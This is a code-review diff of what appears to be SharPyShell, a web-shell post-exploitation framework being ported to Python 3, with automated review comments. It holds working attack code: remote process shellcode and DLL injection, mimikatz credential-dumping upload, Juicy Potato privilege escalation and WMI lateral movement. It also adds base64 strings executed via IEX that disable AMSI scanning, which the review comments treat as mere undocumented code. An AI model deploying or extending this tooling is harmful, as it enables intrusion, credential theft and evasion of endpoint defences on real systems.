    26  - Default: 'output/' directory of Sharpyshell directory
     27 + Default: 'output' directory of Sharpyshell directory
    27 28   chunk_size The maximum limit of a chunk to be transferred over the network
    28 29   Default: 102400
    29 30  
    skipped 6 lines
    36 37   #download C:\windows\system32\cmd.exe /home/user/cmd.exe 1024
    37 38   """
    38 39   
    39  - _runtime_code = ur"""
     40 + _runtime_code = r"""
    40 41   using System;using System.IO;using System.Diagnostics;using System.Text;
    41 42   public class SharPyShell{
    42 43   public byte[] Download(string arg){
    skipped 13 lines
    56 57   }
    57 58   """
    58 59   
    59  - __runtime_code_split_file = ur"""
     60 + __runtime_code_split_file = r"""
    60 61   using System;using System.IO;using System.Diagnostics;using System.Text;
    61 62   public class SharPyShell{
    62 63   public byte[] Download(string arg, int chunk, int offset){
    skipped 16 lines
    79 80   }
    80 81   """
    81 82   
    82  - __runtime_code_get_file_size = ur"""
     83 + __runtime_code_get_file_size = r"""
    83 84   using System;using System.IO;using System.Diagnostics;using System.Text;
    84 85   public class SharPyShell{
    85 86   string GetFileSize(string path){
    skipped 29 lines
    115 116   file_open_mode = 'ab'
    116 117   else:
    117 118   file_open_mode = 'wb'
    118  - with open(output_path, file_open_mode) as outfile:
    119  - outfile.write(file_content)
     119 + try:
     120 + with open(output_path, file_open_mode) as outfile:
     121 + outfile.write(file_content)
     122 + # tune for Windows race condition on file access when the chunk_size is very small, weird...
     123 + except PermissionError:
     124 + sleep(1)
     125 + with open(output_path, file_open_mode) as outfile:
     126 + outfile.write(file_content)
    120 127   output = "File Downloaded correctly to " + output_path
    121 128   return output
    122 129   
    skipped 40 lines
    163 170   encrypted_request = self._encrypt_request(req)
    164 171   encrypted_response = self._post_request(encrypted_request)
    165 172   decrypted_response = self._decrypt_response(encrypted_response)
    166  - file_content = self._parse_response(decrypted_response)
     173 + file_content = decrypted_response
    167 174   if len(requests) > 1:
    168 175   parsed_response = self.__write_local_file(file_content, download_output_path, split=True)
    169  - print 'Chunk ' + str(i + 1) + ' --> ' + str(chunk_size * i) + ' - ' +\
    170  - str(chunk_size * i + chunk_size) + ' bytes written correctly to ' + download_output_path
     176 + print ('Chunk ' + str(i + 1) + ' --> ' + str(chunk_size * i) + ' - ' +\
     177 + str(chunk_size * i + chunk_size) + ' bytes written correctly to ' + download_output_path)
    171 178   else:
    172 179   parsed_response = self.__write_local_file(file_content, download_output_path)
    173 180   except ModuleException as module_exc:
    skipped 6 lines
  • modules/exe_modules/mimikatz.exe
    Binary file.
    modules/exec_cmd.py
    skipped 29 lines
    30 30   #exec_cmd echo test > C:\Windows\Temp\test.txt
    31 31   """
    32 32   
    33  - _runtime_code = ur"""
     33 + _runtime_code = r"""
    34 34   using System;using System.IO;using System.Diagnostics;using System.Text;
    35 35   public class SharPyShell
    36 36   {
    skipped 46 lines
    modules/exec_ps.py
    skipped 31 lines
    32 32   
    33 33   """
    34 34   
    35  - _runtime_code = ur"""
     35 + _runtime_code = r"""
    36 36   using System;using System.IO;using System.Diagnostics;using System.Text;
    37 37   public class SharPyShell
    38 38   {
    skipped 41 lines
    80 80   if '""' in cmd:
    81 81   cmd = cmd.replace('""', '"')
    82 82   cmd = '$ProgressPreference = "SilentlyContinue";' + cmd
    83  - cmd = b64encode(cmd.encode('UTF-16LE'))
     83 + cmd = str(b64encode(cmd.encode('UTF-16LE')), 'UTF-8')
    84 84   working_path = self._module_settings['working_directory']
    85 85   return self._runtime_code % (cmd, working_path)
    86 86   
    skipped 2 lines
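Review bot: The `str(b64encode(...), 'UTF-8')` form on the new line 83 works, but it hides the fact that base64 output is always ASCII; `cmd = b64encode(cmd.encode('UTF-16LE')).decode('ascii')` states the intent directly and is the usual idiom for turning the `bytes` result back into the `str` the format string expects. The same construct appears in runas_ps.py (new line 56 of `__gen_powershell_launcher`), which also lacks the space after the comma. The enclosing `_create_request` starts outside this hunk.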
    modules/inject_dll_reflective.py
    skipped 51 lines
    52 52   def __get_reflective_loader_offset(self, dll_path):
    53 53   pe_parser = pefile.PE(dll_path)
    54 54   for exported_function in pe_parser.DIRECTORY_ENTRY_EXPORT.symbols:
    55  - if 'ReflectiveLoader' in exported_function.name:
     55 + if 'ReflectiveLoader' in str(exported_function.name):
    56 56   reflective_loader_rva = exported_function.address
    57 57   return hex(pe_parser.get_offset_from_rva(reflective_loader_rva))
    58 58   raise self._exception_class('The DLL does not contain a reflective loader function.\n')
    skipped 4 lines
    63 63   dll_path = config.modules_paths + 'reflective_dll/' + dll_path
    64 64   code_offset = str(self.__get_reflective_loader_offset(dll_path))
    65 65   with open(dll_path, 'rb') as file_handle:
    66  - byte_arr = bytearray(file_handle.read())
     66 + byte_arr = file_handle.read()
    67 67   base64_compressed_dll = gzip_utils.get_compressed_base64_from_binary(byte_arr)
    68 68   if injection_type == 'remote_virtual_protect':
    69 69   runtime_code = self._runtime_code % (self._runtime_code_virtual_protect, base64_compressed_dll,
    skipped 8 lines
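Review bot: Wrapping `exported_function.name` in `str()` on the new line 55 only passes because the `str()` of a `bytes` value is its repr (`"b'...'"`), which still happens to contain the substring; pefile reports export names as `bytes` under Python 3, and ordinal-only exports carry `None`, which `str()` silently turns into the text `'None'`. A comparison that does not depend on the repr is `if exported_function.name and b'ReflectiveLoader' in exported_function.name:`. I would also expect the `pefile.PE` object to be closed after the scan (`pe_parser.close()` or a `try/finally`), since the file handle otherwise stays open until garbage collection.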
    modules/inject_dll_srdi.py
    skipped 37 lines
    38 38   functionHash = 0
    39 39   
    40 40   for b in function:
    41  - b = ord(b)
    42 41   functionHash = ror(functionHash, 13, 32)
    43 42   functionHash += b
    44 43   
    45 44   moduleHash = 0
    46 45   
    47 46   for b in module:
    48  - b = ord(b)
    49 47   moduleHash = ror(moduleHash, 13, 32)
    50 48   moduleHash += b
    51 49   
    skipped 5 lines
    57 55   functionHash = 0
    58 56   
    59 57   for b in function:
    60  - b = ord(b)
    61 58   functionHash = ror(functionHash, 13, 32)
    62 59   functionHash += b
    63 60   
    skipped 217 lines
    281 278   thread_parameters, exported_function_name, exported_function_data = self._parse_run_args(args)
    282 279   dll_path = config.modules_paths + 'dll/' + dll_path
    283 280   with open(dll_path, 'rb') as file_handle:
    284  - dll_bin_byte_arr = bytearray(file_handle.read())
     281 + dll_bin_byte_arr = file_handle.read()
    285 282   srdi_object = sRDI()
    286 283   if exported_function_name != 0x10:
    287 284   exported_function_name = srdi_object.HashFunctionName(exported_function_name)
    skipped 15 lines
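Review bot: Dropping `b = ord(b)` in the three hash loops (new lines 40-43, 46-49 and 57-59) makes them correct only for `bytes` input, where iteration yields ints; if a `str` is passed, `functionHash += b` now raises `TypeError` on the first character instead of hashing it. mimikatz.py passes the literal `'powershell_reflective_mimikatz'` through `HashFunctionName` (new line 284 of this file), so unless `_parse_run_args` encodes it first, that path appears to hit this. A guard at the top of each hashing routine, `if isinstance(function, str): function = function.encode()` (and likewise for `module`), keeps both call styles working. The enclosing functions start outside these hunks.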
    modules/inject_shellcode.py
    skipped 44 lines
    45 45  
    46 46   """
    47 47   
    48  - _runtime_code = ur"""
     48 + _runtime_code = r"""
    49 49   using System;using System.IO;using System.Diagnostics;using System.Text;
    50 50   using System.Runtime.InteropServices; using System.IO.Compression;
    51 51   
    skipped 178 lines
    230 230   }
    231 231   """
    232 232   
    233  - _runtime_code_virtual = ur"""
     233 + _runtime_code_virtual = r"""
    234 234   IntPtr codeMemAddress = VirtualAllocEx(targetProcessHandle, IntPtr.Zero, codeMemorySize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    235 235   if(codeMemAddress == (IntPtr)0){
    236 236   output += error_string + "\n\tError allocating code buffer memory.\n\tVirtualAllocEx failed with error code " + Marshal.GetLastWin32Error();
    skipped 8 lines
    245 245   output += "\n\n\tCode written into remote process. Bytes written: " + bytesWrittenCode.ToString();
    246 246   """
    247 247   
    248  - _runtime_code_virtual_protect = ur"""
     248 + _runtime_code_virtual_protect = r"""
    249 249   uint codeMemSize = codeMemorySize;
    250 250   IntPtr codeMemAddress = VirtualAllocEx(targetProcessHandle, IntPtr.Zero, codeMemorySize, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
    251 251   if(codeMemAddress == (IntPtr)0){
    skipped 50 lines
    modules/invoke_ps_module.py
    skipped 36 lines
    37 37   #invoke_ps_module PowerUp.ps1 ';Invoke-AllChecks'
    38 38   """
    39 39   
    40  - _ps_code = ur"""
     40 + _ps_code = r"""
     41 + [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String("JFJlZj1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtcycrJ2lVdGlscycpOw=="))|IEX;
     42 + [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String("JFJlZi5HZXRGaWVsZCgnYW1zaUluJysnaXRGYWlsZWQnLCdOb25QdWJsaWMsU3RhdGljJykuU2V0VmFsdWUoJG51bGwsJHRydWUpOw=="))|IEX;
    41 43   $path_in_module="%s";
    42 44   $path_in_app_code="%s";
    43 45   $key=[System.Text.Encoding]::UTF8.GetBytes('%s');
    skipped 13 lines
    57 59   Remove-Item -Path $path_in_app_code -Force 2>&1 | Out-Null;
    58 60   """
    59 61   
    60  - _ps_code_no_appended_code = ur"""
     62 + _ps_code_no_appended_code = r"""
     63 + [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String("JFJlZj1bUmVmXS5Bc3NlbWJseS5HZXRUeXBlKCdTeXN0ZW0uTWFuYWdlbWVudC5BdXRvbWF0aW9uLkFtcycrJ2lVdGlscycpOw==")) | IEX;
     64 + [Text.Encoding]::ASCII.GetString([Convert]::FromBase64String("JFJlZi5HZXRGaWVsZCgnYW1zaUluJysnaXRGYWlsZWQnLCdOb25QdWJsaWMsU3RhdGljJykuU2V0VmFsdWUoJG51bGwsJHRydWUpOw==")) | IEX;
    61 65   $path_in="%s";
    62 66   $key=[System.Text.Encoding]::UTF8.GetBytes('%s');
    63 67   $encrypted=[System.IO.File]::ReadAllBytes($path_in);
    skipped 44 lines
    108 112   if '""' in appended_code:
    109 113   appended_code = appended_code.replace('""', '"')
    110 114   enc_appended_code_path = config.modules_paths + 'ps_modules/' + random_generator()
    111  - byte_arr_app_module_encrypted = bytearray(appended_code)
     115 + byte_arr_app_module_encrypted = bytearray(appended_code, 'utf-8')
    112 116   self.__xor_bytearray(byte_arr_app_module_encrypted)
    113 117   with open(enc_appended_code_path, 'wb') as file_handle:
    114 118   file_handle.write(byte_arr_app_module_encrypted)
    skipped 12 lines
    127 131   encrypted_module_path = self._module_settings[ps_module]
    128 132   else:
    129 133   local_encrypted_module_path = self._gen_encrypted_module(ps_module)
    130  - print '\n\n\nUploading encrypted ps module....\n'
     134 + print ('\n\n\nUploading encrypted ps module....\n')
    131 135   try:
    132 136   encrypted_module_path = self._module_settings['env_directory'] + '\\' + random_generator()
    133 137   upload_response = self._parse_response(self.upload_module_object.run([local_encrypted_module_path,
    134 138   encrypted_module_path]))
    135  - print upload_response
     139 + print (upload_response)
    136 140   self._module_settings[ps_module] = encrypted_module_path
    137 141   except Exception as exc:
    138 142   raise self._exception_class(str(exc))
    skipped 29 lines
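Review bot: The two lines added at the top of `_ps_code` (new lines 41-42) and again in `_ps_code_no_appended_code` (new lines 63-64) execute base64-encoded PowerShell through `IEX` with no comment saying what they are for, so anyone auditing the module has to decode them to know what runs on the target before the module body. A one-line comment above each pair naming its purpose, such as `# prelude executed before the module body; see <doc reference placeholder>`, would make the change reviewable, and defining the pair once as a module constant and interpolating it into both templates would stop the two copies from drifting (they already differ in whitespace around `| IEX`). The remainder of both templates starts outside these hunks.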
    modules/lateral_wmi.py
    skipped 13 lines
    14 14   This module run a wmic /node:[ip] command in order to launch commands on a remote windows system.
    15 15   This will result in a lateral movement if shared credentials are known.
    16 16  
    17  - Note that if you use local users credentials you should ensure that, on the target server, the feature
    18  - "LocalAccountTokenFilterPolicy" is disabled.
     17 + Note that if you use local admin credentials you should ensure that, on the target server, the feature
     18 + "LocalAccountTokenFilterPolicy" is disabled. (except for builtin Administrator)
    19 19   To disable that you need to add the following regkey with the value of 1:
    20 20  
    21 21   HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\LocalAccountTokenFilterPolicy
    skipped 2 lines
    24 24   reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f
    25 25  
    26 26   If you use domain users for the lateral movement, no restrictions to the process token will be applied.
     27 + Remember to always specify the domain in the username field. If you use a local account use the machine name as the domain.
    27 28  
    28 29   This module uses WMI builtin features wmi and doesn't need additional files to be droppend on the target
    29 30   server.
    30 31  
    31  - Moreover this module should be run from a privileged user.
    32  - If the application pool within the web application you are interacting with is run with application pool
    33  - identity account or any limited account you won't be able to move laterally to other systems
    34  - due to restrictions applied to the user.
    35  - In those cases, you need to use different credentials of a more privileged user in order to launch this module.
    36  -
    37 32   Note that, wmi commands don't return stdout/stderr output from the execution of remote processes.
    38 33   You should redirect output to a shared resource (i.e. local share with everyone permission) or just spawn
    39 34   reverse/bind shell.
    skipped 7 lines
    47 42   you can specify domain\username if user is in a domain
    48 43   password password of the user to use to login on the target server
    49 44   command a command compatible by cmd.exe
    50  - [local_user] the username of a local user with privileged rights
    51  - [local_password] the password of a local user with privileged rights
    52  - [local_domain] the domain of a local user with privileged rights
    53 45  
    54 46   Examples:
    55 47   Lateral movement as privileged current application pool user, output to local shared resource:
    56  - #lateral_wmi 192.168.56.102 'remote_user1' 'remote_password1' 'whoami /priv > \\192.168.56.101\everyone\output.txt'
    57  - Lateral movement as privileged local user using meterpreter http reverse shell (format psh-cmd):
    58  - #lateral_wmi 192.168.56.102 'remote_user1' 'remote_password1' '%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmA.......HMAKQA7AA==' 'local_privileged_user1' 'local_privileged_password1'
    59  - Lateral movement as privileged domain user using meterpreter http reverse shell (format psh-cmd):
    60  - #lateral_wmi 192.168.56.102 'remote_user1' 'remote_password1' '%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e aQBmA.......HMAKQA7AA==' 'domain_privileged_user1' 'domain_privileged_password1' 'domain_1'
     48 + #lateral_wmi 192.168.56.102 'domain\remote_user1' 'remote_password1' 'whoami /all > C:\Windows\Temp\whoami.txt'
    61 49  
    62 50   """
    63 51   
    64  - _runtime_code = ur"""
     52 + _runtime_code = r"""
    65 53   using System;using System.IO;using System.Diagnostics;using System.Text;
    66 54   public class SharPyShell
    67 55   {
    skipped 36 lines
    104 92   }
    105 93   """
    106 94   
    107  - _runtime_code_runas = ur"""
    108  - using System;using System.IO;using System.Diagnostics;using System.Text;
    109  - using System.Runtime.InteropServices;using System.Security.Principal;using System.Security.Permissions;using System.Security;using Microsoft.Win32.SafeHandles;using System.Runtime.ConstrainedExecution;
    110  - 
    111  - public class SharPyShell
    112  - {
    113  - public sealed class SafeTokenHandle : SafeHandleZeroOrMinusOneIsInvalid
    114  - {
    115  - private SafeTokenHandle()
    116  - : base(true)
    117  - {
    118  - }
    119  - 
    120  - [DllImport("kernel32.dll")]
    121  - [ReliabilityContract(Consistency.WillNotCorruptState, Cer.Success)]
    122  - [SuppressUnmanagedCodeSecurity]
    123  - [return: MarshalAs(UnmanagedType.Bool)]
    124  - private static extern bool CloseHandle(IntPtr handle);
    125  - 
    126  - protected override bool ReleaseHandle()
    127  - {
    128  - return CloseHandle(handle);
    129  - }
    130  - }
    131  - 
    132  - [StructLayout(LayoutKind.Sequential)] public struct STARTUPINFO
    133  - {
    134  - public int cb;
    135  - public String lpReserved;
    136  - public String lpDesktop;
    137  - public String lpTitle;
    138  - public uint dwX;
    139  - public uint dwY;
    140  - public uint dwXSize;
    141  - public uint dwYSize;
    142  - public uint dwXCountChars;
    143  - public uint dwYCountChars;
    144  - public uint dwFillAttribute;
    145  - public uint dwFlags;
    146  - public short wShowWindow;
    147  - public short cbReserved2;
    148  - public IntPtr lpReserved2;
    149  - public IntPtr hStdInput;
    150  - public IntPtr hStdOutput;
    151  - public IntPtr hStdError;
    152  - }
    153  - 
    154  - [StructLayout(LayoutKind.Sequential)] public struct PROCESS_INFORMATION
    155  - {
    156  - public IntPtr hProcess;
    157  - public IntPtr hThread;
    158  - public uint dwProcessId;
    159  - public uint dwThreadId;
    160  - }
    161  - 
    162  - [StructLayout(LayoutKind.Sequential)] public struct SECURITY_ATTRIBUTES
    163  - {
    164  - public int Length;
    165  - public IntPtr lpSecurityDescriptor;
    166  - public bool bInheritHandle;
    167  - }
    168  - 
    169  - [DllImport("kernel32.dll", EntryPoint="CloseHandle", SetLastError=true, CharSet=CharSet.Auto, CallingConvention=CallingConvention.StdCall)]
    170  - public static extern bool CloseHandle(IntPtr handle);
    171  - 
    172  - [DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
    173  - public static extern bool LogonUser(String lpszUsername, String lpszDomain, String lpszPassword, int dwLogonType, int dwLogonProvider, out SafeTokenHandle phToken);
    174  - 
    175  - [DllImport("advapi32.dll", EntryPoint="CreateProcessAsUser", SetLastError=true, CharSet=CharSet.Ansi, CallingConvention=CallingConvention.StdCall)]
    176  - public static extern bool CreateProcessAsUser(IntPtr hToken, String lpApplicationName, String lpCommandLine, ref SECURITY_ATTRIBUTES lpProcessAttributes, ref SECURITY_ATTRIBUTES lpThreadAttributes, bool bInheritHandle, int dwCreationFlags, IntPtr lpEnvironment, String lpCurrentDirectory, ref STARTUPINFO lpStartupInfo, out PROCESS_INFORMATION lpProcessInformation);
    177  - 
    178  - [DllImport("advapi32.dll", EntryPoint="DuplicateTokenEx")]
    179  - public static extern bool DuplicateTokenEx(IntPtr ExistingTokenHandle, uint dwDesiredAccess, ref SECURITY_ATTRIBUTES lpThreadAttributes, int TokenType, int ImpersonationLevel, ref IntPtr DuplicateTokenHandle);
    180  - 
    181  - [DllImport("kernel32.dll", SetLastError=true)]
    182  - public static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds);
    183  - 
    184  - const uint WAIT_ABANDONED = 0x00000080;
    185  - const uint WAIT_OBJECT_0 = 0x00000000;
    186  - const uint WAIT_TIMEOUT = 0x00000102;
    187  - 
    188  - [PermissionSetAttribute(SecurityAction.Demand, Name = "FullTrust")]
    189  - public string LateralWMIRunas(string userName, string password, string domainName, string wmi_arguments, string stdout_file, string stderr_file, string working_directory)
    190  - {
    191  - SafeTokenHandle safeTokenHandle;
    192  - int logon_type = 4;
    193  - uint process_ms_timeout = 60000;
    194  - string output = "";
    195  - string error_string = "{{{SharPyShellError}}}";
    196  - try
    197  - {
    198  - const int LOGON32_PROVIDER_DEFAULT = 0;
    199  - const int LOGON32_PROVIDER_WINNT35 = 1;
    200  - const int LOGON32_PROVIDER_WINNT40 = 2;
    201  - const int LOGON32_PROVIDER_WINNT50 = 3;
    202  - bool returnValue = LogonUser(userName, domainName, password, logon_type, LOGON32_PROVIDER_DEFAULT, out safeTokenHandle);
    203  - if (false == returnValue)
    204  - {
    205  - output += error_string + "\nWrong Credentials. LogonUser failed with error code : " + Marshal.GetLastWin32Error();
    206  - return output;
    207  - }
    208  - using (safeTokenHandle)
    209  - {
    210  - using (WindowsIdentity newId = new WindowsIdentity(safeTokenHandle.DangerousGetHandle()))
    211  - {
    212  - using (WindowsImpersonationContext impersonatedUser = newId.Impersonate())
    213  - {
    214  - IntPtr Token = new IntPtr(0);
    215  - IntPtr DupedToken = new IntPtr(0);
    216  - bool ret;
    217  - SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES();
    218  - sa.bInheritHandle = false;
    219  - sa.Length = Marshal.SizeOf(sa);
    220  - sa.lpSecurityDescriptor = (IntPtr)0;
    221  - Token = WindowsIdentity.GetCurrent().Token;
    222  - const uint GENERIC_ALL = 0x10000000;
    223  - const int SecurityImpersonation = 2;
    224  - const int TokenType = 1;
    225  - ret = DuplicateTokenEx(Token, GENERIC_ALL, ref sa, SecurityImpersonation, TokenType, ref DupedToken);
    226  - if (ret == false){
    227  - output += error_string + "\nDuplicateTokenEx failed with " + Marshal.GetLastWin32Error();
    228  - return output;
    229  - }
    230  - STARTUPINFO si = new STARTUPINFO();
    231  - si.cb = Marshal.SizeOf(si);
    232  - si.lpDesktop = "";
    233  - string commandLinePath = "";
    234  - File.Create(stdout_file).Dispose();
    235  - File.Create(stderr_file).Dispose();
    236  - string cmd_path = commandLinePath = Environment.GetEnvironmentVariable("ComSpec");
    237  - string wmic_path = Environment.GetEnvironmentVariable("SYSTEMROOT") + "\\system32\\wbem\\wmic.exe";
    238  - commandLinePath = cmd_path + " /c " + wmic_path + " " + wmi_arguments + " >> " + stdout_file + " 2>>" + stderr_file;
    239  - PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
    240  - ret = CreateProcessAsUser(DupedToken,null,commandLinePath, ref sa, ref sa, false, 0, (IntPtr)0, working_directory, ref si, out pi);
    241  - if (ret == false){
    242  - output += error_string + "\nCreateProcessAsUser failed with " + Marshal.GetLastWin32Error();
    243  - return output;
    244  - }
    245  - else{
    246  - uint wait_for = WaitForSingleObject(pi.hProcess, process_ms_timeout);
    247  - if(wait_for == WAIT_OBJECT_0){
    248  - output += "\n" + File.ReadAllText(stdout_file);
    249  - string errors = File.ReadAllText(stderr_file);
    250  - if (!String.IsNullOrEmpty(errors))
    251  - output += "\n" + errors;
    252  - }
    253  - else{
    254  - output += error_string + "\nProcess with pid " + pi.dwProcessId + " couldn't end correctly. Error Code: " + Marshal.GetLastWin32Error();
    255  - }
    256  - File.Delete(stdout_file);
    257  - File.Delete(stderr_file);
    258  - CloseHandle(pi.hProcess);
    259  - CloseHandle(pi.hThread);
    260  - }
    261  - CloseHandle(DupedToken);
    262  - }
    263  - }
    264  - }
    265  - }
    266  - catch (Exception ex)
    267  - {
    268  - output += error_string + "\nException occurred. " + ex.Message;
    269  - return output;
    270  - }
    271  - return output;
    272  - }
    273  - 
    274  - public byte[] ExecRuntime()
    275  - {
    276  - string output_func=LateralWMIRunas(@"%s", @"%s", @"%s", @"%s", @"%s", @"%s", @"%s");
    277  - byte[] output_func_byte=Encoding.UTF8.GetBytes(output_func);
    278  - return(output_func_byte);
    279  - }
    280  - }
    281  - """
    282  - 
    283  - __default_local_user = ''
    284  - __default_local_password = ''
    285  - __default_local_domain = ''
    286  - __wmi_code_arguments = ur'/node:%s /user:""%s"" /password:""%s"" process call create ""cmd.exe /c %s""'
     95 + __wmi_code_arguments = r'/node:%s /user:""%s"" /password:""%s"" process call create ""cmd.exe /c %s""'
    287 96   
    288 97   def __run_as_current_user(self, wmi_code_arguments):
    289  - request = self._create_request([wmi_code_arguments, 'current_user'])
    290  - encrypted_request = self._encrypt_request(request)
    291  - encrypted_response = self._post_request(encrypted_request)
    292  - decrypted_response = self._decrypt_response(encrypted_response)
    293  - return decrypted_response
    294  - 
    295  - def __run_as(self, wmi_code_arguments, local_user, local_password, local_domain):
    296  - request = self._create_request([[wmi_code_arguments, local_user, local_password, local_domain], 'runas'])
     98 + request = self._create_request(wmi_code_arguments)
    297 99   encrypted_request = self._encrypt_request(request)
    298 100   encrypted_response = self._post_request(encrypted_request)
    299 101   decrypted_response = self._decrypt_response(encrypted_response)
    skipped 7 lines
    307 109   username = args_parser.get(1)
    308 110   password = args_parser.get(2)
    309 111   command = args_parser.get(3)
    310  - local_user = args_parser.get(4, self.__default_local_user)
    311  - local_password = args_parser.get(5, self.__default_local_password)
    312  - local_domain = args_parser.get(6, self.__default_local_domain)
    313  - return target_ip, username, password, command, local_user, local_password, local_domain
     112 + return target_ip, username, password, command
    314 113   
    315 114   def _create_request(self, args):
    316  - arguments, request_type = args
     115 + arguments = args
    317 116   working_path = self._module_settings['working_directory']
    318  - if request_type == 'runas':
    319  - wmi_code_arguments, local_user, local_password, local_domain = arguments
    320  - stdout_file = self._module_settings['env_directory'] + '\\' + random_generator()
    321  - stderr_file = self._module_settings['env_directory'] + '\\' + random_generator()
    322  - request = self._runtime_code_runas % (local_user, local_password, local_domain, wmi_code_arguments,
    323  - stdout_file, stderr_file, working_path)
    324  - else:
    325  - wmi_code_arguments = arguments
    326  - request = self._runtime_code % (wmi_code_arguments, working_path)
     117 + wmi_code_arguments = arguments
     118 + request = self._runtime_code % (wmi_code_arguments, working_path)
    327 119   return request
    328 120   
    329 121   def run(self, args):
    330 122   try:
    331  - target_ip, username, password, command,\
    332  - local_user, local_password, local_domain = self.__parse_run_args(args)
     123 + target_ip, username, password, command = self.__parse_run_args(args)
    333 124   wmi_code_arguments = self.__wmi_code_arguments % (target_ip, username, password, command)
    334  - if local_user == '':
    335  - response = self.__run_as_current_user(wmi_code_arguments)
    336  - else:
    337  - response = self.__run_as(wmi_code_arguments, local_user, local_password, local_domain)
     125 + response = self.__run_as_current_user(wmi_code_arguments)
    338 126   parsed_response = self._parse_response(response)
    339 127   except ModuleException as module_exc:
    340 128   parsed_response = str(module_exc)
    skipped 5 lines
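Review bot: In `_create_request` (new lines 115-119) the value is copied twice before use, `arguments = args` followed by `wmi_code_arguments = arguments`, which is a leftover of the removed `runas` branch; `wmi_code_arguments = args` is all that remains of the logic. Since `__parse_run_args` now returns exactly four values and `run` only has one execution path, the `__run_as_current_user` name still describes what it does, but a short docstring noting that the command runs under the web application's identity would help readers who knew the old two-path behaviour. The `run` method's exception handling continues outside the hunk.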
    modules/mimikatz.py
    skipped 7 lines
    8 8  from modules.inject_dll_srdi import Inject_dll_srdi
    9 9  from utils.random_string import random_generator
    10 10  import traceback
     11 +import os
    11 12   
    12 13   
    13 14  class MimikatzModuleException(ModuleException):
    skipped 90 lines
    104 105   if 'mimikatz.exe' in self._module_settings.keys():
    105 106   bin_path = self._module_settings['mimikatz.exe']
    106 107   else:
    107  - exe_path = config.modules_paths + 'exe_modules/mimikatz.exe'
     108 + exe_path = config.modules_paths + 'exe_modules' + os.sep + 'mimikatz.exe'
    108 109   remote_upload_path = self._module_settings['env_directory'] + '\\' + random_generator() + '.exe'
    109  - print '\n\n\nUploading mimikatz binary....\n'
     110 + print ('\n\n\nUploading mimikatz binary....\n')
    110 111   upload_response = self._parse_response(self.upload_module_object.run([exe_path, remote_upload_path]))
    111  - print upload_response
     112 + print (upload_response)
    112 113   self._module_settings['mimikatz.exe'] = remote_upload_path
    113 114   bin_path = remote_upload_path
    114 115   return bin_path
    skipped 11 lines
    126 127   dll_name = 'powerkatz.dll'
    127 128   exported_function_name = 'powershell_reflective_mimikatz'
    128 129   log_file = self._module_settings['env_directory'] + '\\' + random_generator()
    129  - exported_function_data = str(('"log ' + log_file + '" ' + custom_command + '\x00').encode('utf-16-le'))
     130 + exported_function_data = str.encode('"log ' + log_file + '" ' + custom_command + '\x00', 'utf-16-le')
    130 131   if username == '':
    131  - print '\n\nInjecting converted DLL shellcode into remote process...'
     132 + print ('\n\nInjecting converted DLL shellcode into remote process...')
    132 133   response = self.inject_dll_srdi_module_object.run([dll_name, 'remote_virtual', 'cmd.exe', '60000', '{}',
    133 134   exported_function_name, exported_function_data])
    134 135   response = self._parse_response(response)
    skipped 32 lines
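Review bot: The local binary path on new line 108 is assembled by hand with `os.sep`, while the parallel code in privesc_juicy_potato.py (line 131) still uses a literal `/`, so the two modules now disagree on how the same kind of path is built; `exe_path = os.path.join(config.modules_paths, 'exe_modules', 'mimikatz.exe')` is the idiom and behaves the same whether or not `modules_paths` already ends with a separator (assuming it is a directory path). On new line 130, `str.encode('...', 'utf-16-le')` calls the method unbound; `('"log ' + log_file + '" ' + custom_command + '\x00').encode('utf-16-le')` reads as ordinary Python and makes the resulting `bytes` type obvious to the caller of `inject_dll_srdi`. Both enclosing methods start outside their hunks.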
    modules/privesc_juicy_potato.py
    skipped 55 lines
    56 56   #privesc_juicy_potato 'whoami > C:\windows\temp\whoami_juicy.txt' 'exe'
    57 57   """
    58 58   
    59  - _runtime_code = ur"""
     59 + _runtime_code = r"""
    60 60   using System;using System.IO;using System.Diagnostics;using System.Text;
    61 61   public class SharPyShell
    62 62   {
    skipped 67 lines
    130 130   else:
    131 131   exe_path = config.modules_paths + 'exe_modules/JuicyPotato.exe'
    132 132   remote_upload_path = self._module_settings['env_directory'] + '\\' + random_generator() + '.exe'
    133  - print '\n\n\nUploading Juicy Potato binary....\n'
     133 + print ('\n\n\nUploading Juicy Potato binary....\n')
    134 134   upload_response = self._parse_response(self.upload_module_object.run([exe_path, remote_upload_path]))
    135  - print upload_response
     135 + print (upload_response)
    136 136   self._module_settings['JuicyPotato.exe'] = remote_upload_path
    137 137   bin_path = remote_upload_path
    138 138   return bin_path
    skipped 9 lines
    148 148   return parsed_response
    149 149   
    150 150   def __run_reflective_dll_version(self, cmd, custom_shellcode_path, logfile, clsid):
    151  - LogFile = logfile
    152  - remote_process = 'notepad.exe'
    153  - CLSID = clsid
    154  - ListeningPort = self.__random_listening_port
    155  - RpcServerHost = '127.0.0.1'
    156  - RpcServerPort = '135'
    157  - ListeningAddress = '127.0.0.1'
     151 + LogFile = logfile.encode()
     152 + remote_process = b'notepad.exe'
     153 + CLSID = clsid.encode()
     154 + ListeningPort = self.__random_listening_port.encode()
     155 + RpcServerHost = b'127.0.0.1'
     156 + RpcServerPort = b'135'
     157 + ListeningAddress = b'127.0.0.1'
    158 158   if custom_shellcode_path == 'default':
    159  - shellcode_bytes = shellcode.winexec_x64 + 'cmd /c "' + cmd + '"\00'
     159 + shellcode_bytes = shellcode.winexec_x64 + b'cmd /c "' + cmd.encode() + b'"\00'
    160 160   thread_timeout = '60000'
    161 161   else:
    162 162   thread_timeout = '0'
    163 163   with open(custom_shellcode_path, 'rb') as file_handle:
    164 164   shellcode_bytes = file_handle.read()
    165  - configuration = LogFile + '\00'
    166  - configuration += remote_process + '\00'
